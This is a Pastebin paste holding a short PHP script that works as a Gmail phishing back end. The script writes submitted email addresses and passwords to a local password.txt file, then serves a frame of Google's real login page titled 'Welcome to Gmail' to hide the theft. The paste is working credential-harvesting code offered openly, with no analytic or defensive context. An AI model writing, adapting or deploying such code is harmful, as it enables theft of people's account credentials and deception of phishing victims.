Advertisement
Guest User

input.php

a guest
Oct 8th, 2011
341
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.32 KB | None | 0 0
  1. <?php /* Created on: 5/08/2011 By: Spid3rB0il66*/
  2. $fp = fopen("password.txt", "a");
  3. fwrite($fp, "Username:$_POST[Email]\tPassword:$_POST[Passwd]");
  4. echo "<HTML>
  5.  
  6. <head>
  7. <title>Welcome to Gmail</title>
  8. <FRAMESET cols=\"*\">
  9.  <FRAME SRC=\"https://www.google.com/accounts/ServiceLoginAuth\">
  10.  
  11.  
  12.  
  13.  
  14.  
  15. </FRAMESET>";?>
  16.  
  17.  
  18.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement